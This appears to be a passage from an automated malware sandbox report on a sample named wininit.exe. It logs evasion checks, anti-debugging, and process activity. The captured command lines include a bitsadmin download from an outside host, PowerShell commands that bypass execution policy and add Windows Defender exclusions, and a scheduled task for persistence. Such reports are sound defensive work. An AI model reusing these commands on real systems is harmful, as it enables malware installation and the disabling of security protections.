                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: wininit.exe, 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: svchost.exe, 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, wininit.exe, 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, wininit.exe, 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, BIT6DEB.tmp.3.dr, wininit.exe.5.drBinary or memory string: SBIEDLL.DLL1TV0AQBCWCIN4XCTKWQAH9WPV1OSO5P5R7ZXGPBDDNEOFIBEHZ1ZCW4JOHJSCXPBWEOKFEA3FGZ1ACZQRINSXXSJ1KQGUUXTBIBY1CMSHMA18EAKQJHIVWPXBVHTT1ZVWFGXIUPGNZIDV7ECUTJQGG1SDF7452OWB1YDP5BCRMOENG21SVIGU9FBXDZ5QUWUBEVNJDHA1IO9ZZBF8BG7VQKXAUTP31OSH1M5WI1FVO0FARBOLNKLWUDFBN1NHO9VN2B6B1QWAQDEBHTNG2L1VTJXF64VTO1MWWLZYJVBC5TO1VALH6KWBL0UDHT8FDM15FUOL1JBUIM5L9BSH0MPOGUFEVAMHFINFO
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeMemory allocated: 1A710000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 1430000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: E30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 1510000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWindow / User API: threadDelayed 6324Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWindow / User API: threadDelayed 3502Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5621Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4215Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7574Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1743Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7105Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2479Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6104
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3606
                      Source: C:\Windows\System32\svchost.exe TID: 2788Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exe TID: 736Thread sleep time: -43349848573217419s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628Thread sleep count: 7574 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep count: 1743 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep count: 7105 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1644Thread sleep count: 2479 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 6104 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 892Thread sleep count: 3606 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 1472Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 6484Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\wininit.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\wininit.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477
                      Source: wininit.exe.5.drBinary or memory string: vmware
                      Source: svchost.exe, 00000003.00000002.3278310199.000001BA68C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3280623744.000001BA6E25A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wininit.exe, 00000005.00000002.3290024067.000000001B5E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE7A71 CheckRemoteDebuggerPresent,5_2_00007FF848AE7A71
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\wininit.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Benign windows process drops PE files
                      Source: C:\Windows\System32\svchost.exeFile created: BIT6DEB.tmp.3.drJump to dropped file
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe'
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\wininit.exe "C:\Users\user\AppData\Local\Temp\wininit.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wininit.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
